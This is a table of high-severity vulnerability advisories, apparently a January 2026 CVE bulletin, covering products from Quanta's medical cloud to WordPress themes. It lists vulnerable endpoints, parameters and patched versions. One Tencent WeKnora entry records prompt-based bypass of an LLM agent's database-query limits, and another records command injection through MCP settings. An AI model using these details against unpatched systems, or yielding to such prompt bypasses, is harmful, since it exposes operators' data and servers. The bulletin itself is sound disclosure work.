| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-01-05 | 8.8 | CVE-2025-15240 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| quickjs-ng--quickjs | A vulnerability was determined in quickjs-ng quickjs up to 0.11.0. This vulnerability affects the function js_typed_array_constructor of the file quickjs.c. Executing a manipulation can lead to heap-based buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. This patch is called c5d80831e51e48a83eab16ea867be87f091783c5. A patch should be applied to remediate this issue. | 2026-01-10 | 7.3 | CVE-2026-0821 | VDB-340355 | quickjs-ng quickjs quickjs.c js_typed_array_constructor heap-based overflow VDB-340355 | CTI Indicators (IOB, IOC, IOA) Submit #731780 | quickjs-ng quickjs v0.11.0 Heap-based Buffer Overflow https://github.com/quickjs-ng/quickjs/issues/1296 https://github.com/quickjs-ng/quickjs/pull/1299 https://github.com/quickjs-ng/quickjs/issues/1296#issue-3780003395 https://github.com/quickjs-ng/quickjs/commit/c5d80831e51e48a83eab16ea867be87f091783c5 |
| Red Hat--Red Hat Ansible Automation Platform 2.5 for RHEL 8 | A flaw was found in Ansible Automation Platform (AAP). Read-only scoped OAuth2 API Tokens in AAP, are enforced at the Gateway level for Gateway-specific operations. However, this vulnerability allows read-only tokens to perform write operations on backend services (e.g., Controller, Hub, EDA). If this flaw were exploited, an attacker's capabilities would only be limited by role based access controls (RBAC). | 2026-01-08 | 8.5 | CVE-2025-14025 | https://access.redhat.com/articles/7136004 RHSA-2026:0360 RHSA-2026:0361 RHSA-2026:0408 RHSA-2026:0409 https://access.redhat.com/security/cve/CVE-2025-14025 RHBZ#2418785 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was identified in the NTLM authentication handling of the libsoup HTTP library, used by GNOME and other applications for network communication. When processing extremely long passwords, an internal size calculation can overflow due to improper use of signed integers. This results in incorrect memory allocation on the stack, followed by unsafe memory copying. As a result, applications using libsoup may crash unexpectedly, creating a denial-of-service risk. | 2026-01-08 | 7.5 | CVE-2026-0719 | https://access.redhat.com/security/cve/CVE-2026-0719 RHBZ#2427906 https://gitlab.gnome.org/GNOME/libsoup/-/issues/477 |
| Red Hat--Red Hat JBoss Enterprise Application Platform 8.1 | A flaw was found in the Undertow HTTP server core, which is used in WildFly, JBoss EAP, and other Java applications. The Undertow library fails to properly validate the Host header in incoming HTTP requests.As a result, requests containing malformed or malicious Host headers are processed without rejection, enabling attackers to poison caches, perform internal network scans, or hijack user sessions. | 2026-01-07 | 9.6 | CVE-2025-12543 | RHSA-2026:0383 RHSA-2026:0384 RHSA-2026:0386 https://access.redhat.com/security/cve/CVE-2025-12543 RHBZ#2408784 |
| RED--RED-V Super Digital Signage System RXV-A740R | RED-V Super Digital Signage System 5.1.1 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive webserver log files. Attackers can visit multiple endpoints to retrieve system resources and debug log information without authentication. | 2026-01-06 | 7.5 | CVE-2020-36921 | Zero Science Lab Disclosure (ZSL-2020-5609) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database RED-V Vendor Homepage VulnCheck Advisory: RED-V Super Digital Signage System 5.1.1 Log Information Disclosure Vulnerability |
| remix-run--react-router | React Router is a router for React. In @react-router/node versions 7.0.0 through 7.9.3, @remix-run/deno prior to version 2.17.2, and @remix-run/node prior to version 2.17.2, if createFileSessionStorage() is being used from @react-router/node (or @remix-run/node/@remix-run/deno in Remix v2) with an unsigned cookie, it is possible for an attacker to cause the session to try to read/write from a location outside the specified session file directory. The success of the attack would depend on the permissions of the web server process to access those files. Read files cannot be returned directly to the attacker. Session file reads would only succeed if the file matched the expected session file format. If the file matched the session file format, the data would be populated into the server side session but not directly returned to the attacker unless the application logic returned specific session information. This issue has been patched in @react-router/node version 7.9.4, @remix-run/deno version 2.17.2, and @remix-run/node version 2.17.2. | 2026-01-10 | 9.1 | CVE-2025-61686 | https://github.com/remix-run/react-router/security/advisories/GHSA-9583-h5hc-x8cw |
| remix-run--react-router | React Router is a router for React. In @remix-run/react version prior to 2.17.3. and react-router 7.0.0 through 7.11.0, a XSS vulnerability exists in in React Router's <ScrollRestoration> API in Framework Mode when using the getKey/storageKey props during Server-Side Rendering which could allow arbitrary JavaScript execution during SSR if untrusted content is used to generate the keys. There is no impact if server-side rendering in Framework Mode is disabled, or if Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>) is being used. This issue has been patched in @remix-run/react version 2.17.3 and react-router version 7.12.0. | 2026-01-10 | 8.2 | CVE-2026-21884 | https://github.com/remix-run/react-router/security/advisories/GHSA-8v8x-cx79-35w7 |
| remix-run--react-router | React Router is a router for React. In @remix-run/router version prior to 1.23.2. and react-router 7.0.0 through 7.11.0, React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect. There is no impact if Declarative Mode (<BrowserRouter>) is being used. This issue has been patched in @remix-run/router version 1.23.2 and react-router version 7.12.0. | 2026-01-10 | 8 | CVE-2026-22029 | https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx |
| remix-run--react-router | React Router is a router for React. In @remix-run/react versions 1.15.0 through 2.17.0. and react-router versions 7.0.0 through 7.8.2, a XSS vulnerability exists in in React Router's meta()/<Meta> APIs in Framework Mode when generating script:ld+json tags which could allow arbitrary JavaScript execution during SSR if untrusted content is used to generate the tag. There is no impact if the application is being used in Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>). This issue has been patched in @remix-run/react version 2.17.1 and react-router version 7.9.0. | 2026-01-10 | 7.6 | CVE-2025-59057 | https://github.com/remix-run/react-router/security/advisories/GHSA-3cgp-3xvw-98x8 |
| Rustaurius--Five Star Restaurant Reservations | Authorization Bypass Through User-Controlled Key vulnerability in Rustaurius Five Star Restaurant Reservations allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Five Star Restaurant Reservations: from n/a through 2.7.8. | 2026-01-05 | 8.6 | CVE-2025-68044 | https://vdp.patchstack.com/database/wordpress/plugin/restaurant-reservations/vulnerability/wordpress-five-star-restaurant-reservations-plugin-2-7-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| RustCrypto--elliptic-curves | RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a denial-of-service vulnerability exists in the SM2 PKE decryption path where an invalid elliptic-curve point (C1) is decoded and the resulting value is unwrapped without checking. Specifically, AffinePoint::from_encoded_point(&encoded_c1) may return a None/CtOption::None when the supplied coordinates are syntactically valid but do not lie on the SM2 curve. The calling code previously used .unwrap(), causing a panic when presented with such input. This issue has been patched via commit 085b7be. | 2026-01-10 | 7.5 | CVE-2026-22699 | https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-78p6-6878-8mj6 https://github.com/RustCrypto/elliptic-curves/pull/1602 https://github.com/RustCrypto/elliptic-curves/commit/085b7bee647029bd189e1375203418205006bcab |
| RustCrypto--elliptic-curves | RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a denial-of-service vulnerability exists in the SM2 public-key encryption (PKE) implementation: the decrypt() path performs unchecked slice::split_at operations on input buffers derived from untrusted ciphertext. An attacker can submit short/undersized ciphertext or carefully-crafted DER-encoded structures to trigger bounds-check panics (Rust unwinding) which crash the calling thread or process. This issue has been patched via commit e60e991. | 2026-01-10 | 7.5 | CVE-2026-22700 | https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-j9xq-69pf-pcm8 https://github.com/RustCrypto/elliptic-curves/pull/1603 https://github.com/RustCrypto/elliptic-curves/commit/e60e99167a9a2b187ebe80c994c5204b0fdaf4ab |
| SaasProject--Booking Package | Improper Validation of Specified Quantity in Input vulnerability in SaasProject Booking Package allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Booking Package: from n/a through 1.6.27. | 2026-01-05 | 7.5 | CVE-2024-30516 | https://vdp.patchstack.com/database/wordpress/plugin/booking-package/vulnerability/wordpress-booking-package-plugin-1-6-27-price-manipulation-vulnerability?_s_id=cve |
| salvo-rs--salvo | Salvo is a Rust web backend framework. Prior to version 0.88.1, the function list_html generate an file view of a folder which include a render of the current path, in which its inserted in the HTML without proper sanitation, this leads to reflected XSS using the fact that request path is decoded and normalized in the matching stage but not is inserted raw in the html view (current.path), the only constraint here is for the root path (eg. /files in the PoC example) to have a sub directory (e.g common ones styles/scripts/etc) so that the matching return the list HTML page instead of the Not Found page. This issue has been patched in version 0.88.1. | 2026-01-08 | 8.8 | CVE-2026-22256 | https://github.com/salvo-rs/salvo/security/advisories/GHSA-rjf8-2wcw-f6mp https://github.com/salvo-rs/salvo/blob/16efeba312a274739606ce76366d921768628654/crates/serve-static/src/dir.rs#L593 |
| salvo-rs--salvo | Salvo is a Rust web backend framework. Prior to version 0.88.1, the function list_html generates a file view of a folder without sanitizing the files or folders names, this may potentially lead to XSS in cases where a website allow the access to public files using this feature and anyone can upload a file. This issue has been patched in version 0.88.1. | 2026-01-08 | 8.8 | CVE-2026-22257 | https://github.com/salvo-rs/salvo/security/advisories/GHSA-54m3-5fxr-2f3j https://github.com/salvo-rs/salvo/blob/16efeba312a274739606ce76366d921768628654/crates/serve-static/src/dir.rs#L581 |
| Sangfor--Operation and Maintenance Management System | A vulnerability was found in Sangfor Operation and Maintenance Management System up to 3.0.8. This issue affects some unknown processing of the file /isomp-protocol/protocol/getHis of the component HTTP POST Request Handler. The manipulation of the argument sessionPath results in os command injection. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 9.8 | CVE-2025-15500 | VDB-340345 | Sangfor Operation and Maintenance Management System HTTP POST Request getHis os command injection VDB-340345 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727208 | Sangfor Operation and Maintenance Management System (OSM / è¿ç»´å®‰å…¨ç®¡ç†ç³»ç»Ÿ) 3.0.8 OS Command Injection https://github.com/master-abc/cve/issues/11 https://github.com/master-abc/cve/issues/11#issue-3770602189 |
| Sangfor--Operation and Maintenance Management System | A vulnerability was determined in Sangfor Operation and Maintenance Management System up to 3.0.8. Impacted is the function WriterHandle.getCmd of the file /isomp-protocol/protocol/getCmd. This manipulation of the argument sessionPath causes os command injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 9.8 | CVE-2025-15501 | VDB-340346 | Sangfor Operation and Maintenance Management System getCmd WriterHandle.getCmd os command injection VDB-340346 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727214 | Sangfor Operation and Maintenance Management System (OSM / è¿ç»´å®‰å…¨ç®¡ç†ç³»ç»Ÿ) 3.0.8 OS Command Injection https://github.com/master-abc/cve/issues/12 https://github.com/master-abc/cve/issues/12#issue-3770615262 |
| Sangfor--Operation and Maintenance Management System | A vulnerability has been found in Sangfor Operation and Maintenance Management System up to 3.0.8. This vulnerability affects the function uploadCN of the file VersionController.java. The manipulation of the argument filename leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 8.8 | CVE-2025-15499 | VDB-340344 | Sangfor Operation and Maintenance Management System VersionController.java uploadCN os command injection VDB-340344 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727207 | Sangfor Operation and Maintenance Management System (è¿ç»´å®‰å…¨ç®¡ç†ç³»ç»Ÿ / OSM) 3.0.8 Command Injection https://github.com/master-abc/cve/issues/10 https://github.com/master-abc/cve/issues/10#issue-3770540830 |
| Sangfor--Operation and Maintenance Management System | A vulnerability was identified in Sangfor Operation and Maintenance Management System up to 3.0.8. The affected element is the function SessionController of the file /isomp-protocol/protocol/session. Such manipulation of the argument Hostname leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-10 | 7.3 | CVE-2025-15502 | VDB-340347 | Sangfor Operation and Maintenance Management System session SessionController os command injection VDB-340347 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727217 | Sangfor Operation and Maintenance Management System (OSM / è¿ç»´å®‰å…¨ç®¡ç†ç³»ç»Ÿ) 3.0.8 OS Command Injection https://github.com/master-abc/cve/issues/14 https://github.com/master-abc/cve/issues/14#issue-3770634476 |
| Sangfor--Operation and Maintenance Management System | A security flaw has been discovered in Sangfor Operation and Maintenance Management System up to 3.0.8. The impacted element is an unknown function of the file /fort/trust/version/common/common.jsp. Performing a manipulation of the argument File results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-10 | 7.3 | CVE-2025-15503 | VDB-340348 | Sangfor Operation and Maintenance Management System common.jsp unrestricted upload VDB-340348 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727253 | Sangfor Operation and Maintenance Management System (OSM / è¿ç»´å®‰å…¨ç®¡ç†ç³»ç»Ÿ) 3.0.8 Unrestricted Upload https://github.com/master-abc/cve/issues/13 https://github.com/master-abc/cve/issues/13#issue-3770623333 |
| Sfwebservice--InWave Jobs | Missing Authorization vulnerability in Sfwebservice InWave Jobs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects InWave Jobs: from n/a through 3.5.8. | 2026-01-06 | 9.8 | CVE-2025-39477 | https://patchstack.com/database/wordpress/plugin/iwjob/vulnerability/wordpress-inwave-jobs-plugin-3-5-8-broken-access-control-vulnerability?_s_id=cve |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.28.25. This is due to insufficient validation of user-supplied role values in the 'validate_value', 'pre_update_value', and 'get_fields_display' functions. This makes it possible for unauthenticated attackers to register as administrators and gain complete control of the site, granted they can access a user registration form containing a Role field. | 2026-01-09 | 9.8 | CVE-2025-14736 | https://www.wordfence.com/threat-intel/vulnerabilities/id/07eb71fc-6588-490d-8947-3077ec4a9045?source=cve https://plugins.trac.wordpress.org/changeset/3427243/acf-frontend-form-element/trunk/main/frontend/fields/user/class-role.php |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to missing authorization to unauthorized data modification and deletion due to a missing capability check on the 'delete_object' function in all versions up to, and including, 3.28.25. This makes it possible for unauthenticated attackers to delete arbitrary posts, pages, products, taxonomy terms, and user accounts. | 2026-01-09 | 9.1 | CVE-2025-14741 | https://www.wordfence.com/threat-intel/vulnerabilities/id/53adbab6-953a-4a6f-bbfc-89efdbdd28e0?source=cve https://plugins.trac.wordpress.org/browser/acf-frontend-form-element/tags/3.28.26/main/frontend/fields/general/class-delete-object.php?marks=106,119,132,142#L106 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acff' parameter in the 'frontend_admin/forms/update_field' AJAX action in all versions up to, and including, 3.28.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 7.2 | CVE-2025-14937 | https://www.wordfence.com/threat-intel/vulnerabilities/id/46c988ff-9cc5-4f2b-a3dd-06eaef5a7919?source=cve https://plugins.trac.wordpress.org/changeset/3427236/acf-frontend-form-element |
| Shazdeh--Header Image Slider | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Shazdeh Header Image Slider header-image-slider allows DOM-Based XSS.This issue affects Header Image Slider: from n/a through 0.3. | 2026-01-06 | 7.1 | CVE-2024-30547 | https://patchstack.com/database/wordpress/plugin/header-image-slider/vulnerability/wordpress-header-image-slider-plugin-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Shenzhen Xingmeng Qihang Media Co., Ltd.--QiHang Media Web (QH.aspx) Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains a sensitive information disclosure vulnerability that allows remote attackers to intercept user authentication credentials through cleartext cookie transmission. Attackers can perform man-in-the-middle attacks to capture and potentially misuse stored authentication credentials transmitted in an insecure manner. | 2026-01-06 | 7.5 | CVE-2020-36914 | Zero Science Lab Disclosure (ZSL-2020-5578) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry HowFor Vendor Homepage VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Cookie Authentication Credentials Disclosure |
| solwininfotech--User Activity Log | The User Activity Log plugin is vulnerable to a limited options update in versions up to, and including, 2.2. The failed-login handler 'ual_shook_wp_login_failed' lacks a capability check and writes failed usernames directly into update_option() calls. This makes it possible for unauthenticated attackers to push select site options from 0 to a non-zero value, allowing them to reopen registration or corrupt options like 'wp_user_roles', breaking wp-admin access. | 2026-01-07 | 7.5 | CVE-2025-11877 | https://www.wordfence.com/threat-intel/vulnerabilities/id/24225f47-cec2-4270-88f0-8696ebfb7168?source=cve https://plugins.trac.wordpress.org/browser/user-activity-log/trunk/user-functions.php |
| Sony Electronics Inc.--Sony BRAVIA Digital Signage | Sony BRAVIA Digital Signage 1.7.8 contains an insecure direct object reference vulnerability that allows attackers to bypass authorization controls. Attackers can access hidden system resources like '/#/content-creation' by manipulating client-side access restrictions. | 2026-01-06 | 9.8 | CVE-2020-36923 | Zero Science Lab Disclosure (ZSL-2020-5611) IBM X-Force Exchange Vulnerability Entry CXSecurity Vulnerability Listing Packet Storm Security Exploit Archive Sony Professional Display Software Product Page BRAVIA Signage Software Resources Sony BRAVIA Digital Signage Official Homepage VulnCheck Advisory: Sony BRAVIA Digital Signage 1.7.8 Client-Side Protection Bypass via IDOR |
| spinnaker--spinnaker | Spinnaker is an open source, multi-cloud continuous delivery platform. Versions prior to 2025.1.6, 2025.2.3, and 2025.3.0 are vulnerable to server-side request forgery. The primary impact is allowing users to fetch data from a remote URL. This data can be then injected into spinnaker pipelines via helm or other methods to extract things LIKE idmsv1 authentication data. This also includes calling internal spinnaker API's via a get and similar endpoints. Further, depending upon the artifact in question, auth data may be exposed to arbitrary endpoints (e.g. GitHub auth headers) leading to credentials exposure. To trigger this, a spinnaker installation MUST have two things. The first is an artifact enabled that allows user input. This includes GitHub file artifacts, BitBucket, GitLab, HTTP artifacts and similar artifact providers. JUST enabling the http artifact provider will add a "no-auth" http provider that could be used to extract link local data (e.g. AWS Metadata information). The second is a system that can consume the output of these artifacts. e.g. Rosco helm can use this to fetch values data. K8s account manifests if the API returns JSON can be used to inject that data into the pipeline itself though the pipeline would fail. This vulnerability is fixed in versions 2025.1.6, 2025.2.3, and 2025.3.0. As a workaround, disable HTTP account types that allow user input of a given URL. This is probably not feasible in most cases. Git, Docker and other artifact account types with explicit URL configurations bypass this limitation and should be safe as they limit artifact URL loading. Alternatively, use one of the various vendors which provide OPA policies to restrict pipelines from accessing or saving a pipeline with invalid URLs. | 2026-01-05 | 7.9 | CVE-2025-61916 | https://github.com/spinnaker/spinnaker/security/advisories/GHSA-vrjc-q2fh-6x9h |
| spree--spree | Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Unauthenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an unauthenticated attacker to access guest address information without supplying valid credentials or session cookies. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5. | 2026-01-10 | 7.5 | CVE-2026-22589 | https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr https://github.com/spree/spree/commit/16067def6de8e0742d55313e83b0fbab6d2fd795 https://github.com/spree/spree/commit/4c2bd62326fba0d846fd9e4bad2c62433829b3ad https://github.com/spree/spree/commit/d051925778f24436b62fa8e4a6b842c72ca80a67 https://github.com/spree/spree/commit/e1cff4605eb15472904602aebaf8f2d04852d6ad |
| staniel359--muffon | muffon is a cross-platform music streaming client for desktop. Versions prior to 2.3.0 have a one-click Remote Code Execution (RCE) vulnerability in. An attacker can exploit this issue by embedding a specially crafted `muffon://` link on any website they control. When a victim visits the site or clicks the link, the browser triggers Muffon's custom URL handler, causing the application to launch and process the URL. This leads to RCE on the victim's machine without further interaction. Version 2.3.0 patches the issue. | 2026-01-05 | 8.8 | CVE-2025-55204 | https://github.com/staniel359/muffon/security/advisories/GHSA-gc3f-gqph-522q https://drive.google.com/file/d/1eCPCQ6leuVM_vecfofFv04c0t9isCBqR/view?usp=sharing https://github.com/staniel359/muffon/releases/tag/v2.3.0 |
| SUSE--harvester | Projects using the SUSE Virtualization (Harvester) environment may expose the OS default ssh login password if they are using the 1.5.x or 1.6.x interactive installer to either create a new cluster or add new hosts to an existing cluster. The environment is not affected if the PXE boot mechanism is utilized along with the Harvester configuration setup. | 2026-01-08 | 9.8 | CVE-2025-62877 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-62877 https://github.com/harvester/harvester/security/advisories/GHSA-6g8q-hp2j-gvwv |
| SUSE--neuvector | NeuVector supports login authentication through OpenID Connect. However, the TLS verification (which verifies the remote server's authenticity and integrity) for OpenID Connect is not enforced by default. As a result this may expose the system to man-in-the-middle (MITM) attacks. | 2026-01-08 | 8.8 | CVE-2025-66001 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66001 https://github.com/neuvector/neuvector/security/advisories/GHSA-4jj9-cgqc-x9h5 |
| Tdmsignage--TDM Digital Signage PC Player | TDM Digital Signage PC Player 4.1.0.4 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files. Attackers can leverage the 'Modify' permissions for authenticated users to replace executable files with malicious binaries and gain elevated system access. | 2026-01-06 | 8.8 | CVE-2020-36916 | ExploitDB-48953 TDM Digital Signage Official Website Sony Professional Display Software Product Page Zero Science Lab Disclosure (ZSL-2020-5604) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: TDM Digital Signage PC Player 4.1.0.4 Privilege Escalation via Insecure Permissions |
| Tencent--WeKnora | WeKnora is an LLM-powered framework designed for deep document understanding and semantic retrieval. Prior to version 0.2.5, there is a command injection vulnerability that allows authenticated users to inject stdio_config.command/args into MCP stdio settings, causing the server to execute subprocesses using these injected values. This issue has been patched in version 0.2.5. | 2026-01-10 | 10 | CVE-2026-22688 | https://github.com/Tencent/WeKnora/security/advisories/GHSA-78h3-63c4-5fqc https://github.com/Tencent/WeKnora/commit/f7900a5e9a18c99d25cec9589ead9e4e59ce04bb |
| Tencent--WeKnora | WeKnora is an LLM-powered framework designed for deep document understanding and semantic retrieval. Prior to version 0.2.5, after WeKnora enables the Agent service, it allows users to call the database query tool. Due to insufficient backend validation, an attacker can use prompt based bypass techniques to evade query restrictions and obtain sensitive information from the target server and database. This issue has been patched in version 0.2.5. | 2026-01-10 | 8.1 | CVE-2026-22687 | https://github.com/Tencent/WeKnora/security/advisories/GHSA-pcwc-3fw3-8cqv https://github.com/Tencent/WeKnora/commit/da55707022c252dd2c20f8e18145b2d899ee06a1 |
| Tenda--AC23 | A weakness has been identified in Tenda AC23 16.03.07.52. This affects the function sscanf of the file /goform/PowerSaveSet. Executing a manipulation of the argument Time can lead to buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-06 | 8.8 | CVE-2026-0640 | VDB-339683 | Tenda AC23 PowerSaveSet sscanf buffer overflow VDB-339683 | CTI Indicators (IOB, IOC, IOA) Submit #731772 | Tenda AC23 V16.03.07.52 Buffer Overflow https://github.com/xyh4ck/iot_poc/blob/main/Tenda%20AC23_Buffer_Overflow/Tenda%20AC23_Buffer_Overflow.md https://github.com/xyh4ck/iot_poc/blob/main/Tenda%20AC23_Buffer_Overflow/Tenda%20AC23_Buffer_Overflow.md#poc https://www.tenda.com.cn/ |
| the-hideout--tarkov-data-manager | The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, an authentication bypass vulnerability in the login endpoint allows any unauthenticated user to gain full admin access to the Tarkov Data Manager admin panel by exploiting a JavaScript prototype property access vulnerability, combined with loose equality type coercion. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities. | 2026-01-07 | 9.8 | CVE-2026-21854 | https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-r8w6-9xwg-6h73 https://github.com/the-hideout/tarkov-data-manager/commit/f188f0abf766cefe3f1b7b4fc6fe9dad3736174a |
| the-hideout--tarkov-data-manager | The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, a reflected Cross Site Scripting (XSS) vulnerability in the toast notification system allows any attacker to execute arbitrary JavaScript in the context of a victim's browser session by crafting a malicious URL. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities. | 2026-01-07 | 9.3 | CVE-2026-21855 | https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-9c23-rrg9-jc89 |
| the-hideout--tarkov-data-manager | The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8, a time based blind SQL injection vulnerability in the webhook edit and scanner api endpoints that allow an authenticated attacker to execute arbitrary SQL queries against the MySQL database. Commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8 contains a patch. | 2026-01-07 | 7.2 | CVE-2026-21856 | https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-4gcx-ghwc-rc78 https://github.com/the-hideout/tarkov-data-manager/commit/9bdb3a75a98a7047b6d70144eb1da1655d6992a8 |
| ThemeREX Group--Hope | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Group Hope charity-is-hope allows PHP Local File Inclusion.This issue affects Hope: from n/a through 3.0.0. | 2026-01-07 | 8.1 | CVE-2025-69081 | https://patchstack.com/database/wordpress/theme/charity-is-hope/vulnerability/wordpress-hope-theme-3-0-0-local-file-inclusion-vulnerability?_s_id=cve |
| Themesgrove--WidgetKit Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themesgrove WidgetKit Pro allows Reflected XSS.This issue affects WidgetKit Pro: from n/a through 1.13.1. | 2026-01-07 | 7.1 | CVE-2025-46494 | https://patchstack.com/database/wordpress/plugin/widgetkit-pro/vulnerability/wordpress-widgetkit-pro-plugin-1-13-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Themify--Shopo | Unrestricted Upload of File with Dangerous Type vulnerability in Themify Shopo allows Upload a Web Shell to a Web Server.This issue affects Shopo: from n/a through 1.1.4. | 2026-01-05 | 9.9 | CVE-2025-31048 | https://vdp.patchstack.com/database/wordpress/theme/shopo/vulnerability/wordpress-shopo-1-1-4-arbitrary-file-upload-vulnerability?_s_id=cve |
| Themify--Themify Edmin | Deserialization of Untrusted Data vulnerability in Themify Themify Edmin allows Object Injection.This issue affects Themify Edmin: from n/a through 2.0.0. | 2026-01-05 | 8.8 | CVE-2025-31047 | https://vdp.patchstack.com/database/wordpress/theme/edmin/vulnerability/wordpress-themify-edmin-2-0-0-php-object-injection-vulnerability?_s_id=cve |
| Themify--Themify Sidepane WordPress Theme | Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Sidepane WordPress Theme, Themify Themify Newsy, Themify Themify Folo, Themify Themify Edmin, Themify Bloggie, Themify Photobox, Themify Wigi, Themify Rezo, Themify Slide allows Upload a Web Shell to a Web Server.This issue affects Themify Sidepane WordPress Theme: from n/a through 1.9.8; Themify Newsy: from n/a through 1.9.9; Themify Folo: from n/a through 1.9.6; Themify Edmin: from n/a through 2.0.0; Bloggie: from n/a through 2.0.8; Photobox: from n/a through 2.0.1; Wigi: from n/a through 2.0.1; Rezo: from n/a through 1.9.7; Slide: from n/a through 1.7.5. | 2026-01-06 | 9.9 | CVE-2025-30996 | https://patchstack.com/database/wordpress/theme/sidepane/vulnerability/wordpress-themify-sidepane-wordpress-theme-1-9-8-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/newsy/vulnerability/wordpress-themify-newsy-1-9-9-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/folo/vulnerability/wordpress-themify-folo-1-9-6-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/edmin/vulnerability/wordpress-themify-edmin-2-0-0-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/bloggie/vulnerability/wordpress-bloggie-2-0-8-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/photobox/vulnerability/wordpress-photobox-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/wigi/vulnerability/wordpress-wigi-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/rezo/vulnerability/wordpress-rezo-1-9-7-arbitrary-file-upload-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/theme/slide/vulnerability/wordpress-slide-1-7-5-arbitrary-file-upload-vulnerability?_s_id=cve |
